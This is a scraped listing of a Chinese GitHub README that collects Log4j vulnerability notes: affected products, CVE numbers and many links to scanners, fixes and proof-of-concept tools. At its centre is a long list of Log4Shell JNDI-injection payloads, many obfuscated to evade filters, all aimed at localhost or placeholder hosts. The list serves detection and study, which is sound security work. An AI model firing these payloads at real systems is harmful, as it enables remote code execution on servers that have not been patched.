SkillAgentSearch skills...

Log4j2

《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库!Tribute to the most invincible Java logging library in the universe!

Install / Use

/learn @HackJava/Log4j2
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

HackLog4j-永恒之恶龙

本项目用来致敬全宇宙最无敌的Java日志库!同时也记录自己在学习Log4j漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2021年12月10日,最近的一次更新时间为2022年12月27日。作者:0e0w

00-Log4j永恒恶龙

  • https://github.com/Goqi/ELong

01-Log4j基础知识

  • https://github.com/apache/logging-log4j2

02-Log4j框架识别

  • 待更新

03-Log4j上层建筑

log4j + ? = rce !

  • [x] Apache Flink
  • [x] Apache Struts2
  • [ ] Apache Spark
  • [x] Apache Storm
  • [ ] Apache Tomcat
  • [x] Apache Solr
  • [ ] Apache Dubbo
  • [ ] Apache Druid
  • [x] Apache OFBiz
  • [ ] Apache Flume
  • [ ] Redis
  • [ ] Logstash
  • [ ] ElasticSearch
  • [ ] Apache Kafka
  • [ ] Ghidra
  • [ ] Spring-Boot-strater-log4j2
  • [ ] VMware vCenter
  • [ ] Minecraft
  • [x] hikvision
  • ......
  • https://fofa.so/static_pages/log4j2
  • https://github.com/cisagov/log4j-affected-db
  • https://github.com/YfryTchsGD/Log4jAttackSurface
  • https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
  • https://github.com/CrackerCat/Log4jAttackSurface
  • https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
  • https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
  • https://github.com/authomize/log4j-log4shell-affected
  • https://github.com/NS-Sp4ce/Vm4J
  • https://github.com/dinosn/hikvision

04-Log4j漏洞汇总

  • CVE-2021-45105
  • CVE-2021-44228
  • CVE-2021-4104
  • CVE-2019-17571
  • CVE-2017-5645

05-Log4j检测利用

如何判断一个网站是否存在Log4j JNDI注入漏洞?如何查找内网中存在Log4j JNDI注入漏洞?

一、Payload

${jndi:ldap://127.0.0.1/poc}
${jndi:rmi://127.0.0.1/poc}
${jndi:dns://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
$%7Bjndi:ldap://127.0.0.1/poc%7D
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1/poc}
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}127.0.0.1/poc}
${jndi:${lower:l}${lower:d}ap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://k123.k123.k123/poc}
${${::-j}ndi:rmi://k123.k123.k123/ass}
${jndi:rmi://k8.k123.k123}
${${lower:jndi}:${lower:rmi}://k8.k123.k123/poc}
${${lower:${lower:jndi}}:${lower:rmi}://k8.k123.k123/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://k8.k123.k123/poc}
j${loWer:Nd}i${uPper::}
${jndi:ldaps://127.0.0.1/poc}
${jndi:iiop://127.0.0.1/poc}
${date:ldap://127.0.0.1/poc}
${java:ldap://127.0.0.1/poc}
${marker:ldap://127.0.0.1/poc}
${ctx:ldap://127.0.0.1/poc}
${lower:ldap://127.0.0.1/poc}
${upper:ldap://127.0.0.1/poc}
${main:ldap://127.0.0.1/poc}
${jvmrunargs:ldap://127.0.0.1/poc}
${sys:ldap://127.0.0.1/poc}
${env:ldap://127.0.0.1/poc}
${log4j:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
${jndi:rmi://127.0.0.1}/
${jnd${123%25ff:-${123%25ff:-i:}}ldap://127.0.0.1/poc}
${jndi:dns://127.0.0.1}
${j${k8s:k5:-ND}i:ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i:ldap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap${sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap://127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}ldap{sd:k5:-:}//127.0.0.1/poc}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//127.0.0.1/poc}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//127.0.0.1/poc
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//127.0.0.1/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://127.0.0.1}
${jnd${upper:i}:ldap://127.0.0.1/poc}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://127.0.0.1/poc}
${jndi:ldap://127.0.0.1#127.0.0.1:1389/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1/poc}
${${lower:jndi}:${lower:ldap}://127.0.0.1/poc}
${${::-j}ndi:rmi://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:ldap}://127.0.0.1/poc}
${${lower:jndi}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://127.0.0.1/poc}
${${lower:${lower:jndi}}:${lower:rmi}://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}p://127.0.0.1/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:ldap://127.0.0.1/poc}
${j${env:DOESNOTEXIST:-}ndi:rmi://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:ldap://127.0.0.1/poc}
${${: : : : ::: :: :: : :::-j}ndi:rmi://127.0.0.1/poc}
${${::::::::::::::-j}ndi:ldap://127.0.0.1/poc}
${${::::::::::::::-j}ndi:rmi://127.0.0.1/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1/poc}
  • https://github.com/trickest/log4j
  • https://github.com/test502git/log4j-fuzz-head-poc
  • https://github.com/woodpecker-appstore/log4j-payload-generator
  • https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

二、源码检测

  • https://github.com/google/log4jscanner
  • https://github.com/hupe1980/scan4log4shell
  • https://github.com/logpresso/CVE-2021-44228-Scanner
  • https://github.com/xsultan/log4jshield
  • https://github.com/Joefreedy/Log4j-Windows-Scanner
  • https://github.com/back2root/log4shell-rex
  • https://github.com/Neo23x0/log4shell-detector
  • https://github.com/dwisiswant0/look4jar
  • https://github.com/Qualys/log4jscanwin
  • https://github.com/lijiejie/log4j2_vul_local_scanner
  • https://github.com/palantir/log4j-sniffer
  • https://github.com/mergebase/log4j-detector
  • https://www.t00ls.cc/thread-63931-1-1.html
  • https://github.com/darkarnium/Log4j-CVE-Detect
  • https://github.com/whitesource/log4j-detect-distribution
  • https://github.com/fox-it/log4j-finder
  • https://github.com/webraybtl/Log4j

三、出网检测

  • https://github.com/dorkerdevil/Log-4-JAM
  • https://github.com/adilsoybali/Log4j-RCE-Scanner
  • https://github.com/cisagov/log4j-scanner

四、不出网检测

  • https://github.com/For-ACGN/Log4Shell
  • https://github.com/proferosec/log4jScanner
  • https://github.com/Y0-kan/Log4jShell-Scan
  • https://github.com/j5s/Log4j2Scan
  • https://github.com/EmYiQing/JNDIScan

五、主动扫描

  • https://github.com/ilsubyeega/log4j2-exploits
  • https://github.com/Cyronlee/log4j-rce
  • https://github.com/handbye/Log4j2Fuzz

六、被动扫描

  • https://github.com/silentsignal/burp-log4shell
  • https://github.com/pmiaowu/log4jScan
  • https://github.com/guguyu1/log4j2_burp_scan
  • https://github.com/whwlsfb/Log4j2Scan
  • https://github.com/bigsizeme/Log4j-check
  • https://github.com/f0ng/log4j2burpscanner
  • https://github.com/pmiaowu/log4j2Scan
  • https://github.com/bit4woo/log4jScan
  • https://github.com/izj007/Log4j2Scan
  • https://github.com/gh0stkey/Log4j2-RCE-Scanner
  • https://github.com/p1n93r/Log4j2Scan
  • https://github.com/mostwantedduck/BurpLog4j2Scan
  • https://github.com/j3ers3/Log4Scan

七、Header检测

  • https://github.com/fullhunt/log4j-scan
  • https://github.com/0xInfection/LogMePwn
  • https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

八、请求参数检测

九、其他工具

  • https://github.com/dbgee/log4j2_rce
  • https://github.com/ReadER-L/log4j-rce
  • https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
  • https://github.com/Seayon/Log4j2RCE_Demo
  • https://github.com/elbosso/Log4J2CustomJMXAppender
  • https://github.com/ahus1/logging-and-tracing
  • https://github.com/stuartwdouglas/log4j-jndi-agent
  • https://github.com/xiajun325/apache-log4j-rce-poc
  • https://github.com/caoli5288/log4j2jndiinterceptor
  • https://github.com/y35uishere/Log4j2-CVE-2021-44228
  • https://github.com/ErdbeerbaerLP/log4jfix
  • https://github.com/0x0021h/apache-log4j-rce
  • https://github.com/Gav06/RceFix
  • https://github.com/UltraVanilla/LogJackFix
  • https://github.com/iamsino/log4j2-Exp
  • https://github.com/bkfish/Apache-Log4j-Learning
  • https://github.com/LoliKingdom/NukeJndiLookupFromLog4j
  • https://github.com/tangxiaofeng7/apache-log4j-poc
  • https://github.com/h1b1ki/apache-log4j-poc
  • https://github.com/EmptyIrony/Log4j2Fixer
  • https://github.com/AzisabaNetwork/Log4j2Fix
  • https://github.com/apple502j/Log4Jail
  • https://github.com/jacobtread/L4J-Vuln-Patch
  • https://github.com/stardust1900/log4j-2.15.0
  • https://github.com/nest-x/nestx-log4js
  • https://github.com/Marcelektro/Log4J-RCE-Implementation
  • https://github.com/jdremillard/json-logging
  • https://github.com/parayaluyanta/sell-logs-and-peace
  • https://github.com/albar965/atools
  • https://github.com/Al0sc/Log4j-rce
  • https://github.com/ven0n1/Log4jv2Maven
  • https://github.com/akunzai/log4j2-sendgrid-appender
  • https://github.com/inbug-team/Log4j_RCE_Tool
  • https://github.com/zlepper/CVE-2021-44228-Test-Server
  • https://github.com/webraybtl/Log4j
  • https:
View on GitHub
GitHub Stars204
CategoryDevelopment
Updated3mo ago
Forks64

Security Score

82/100

Audited on Jan 9, 2026

No findings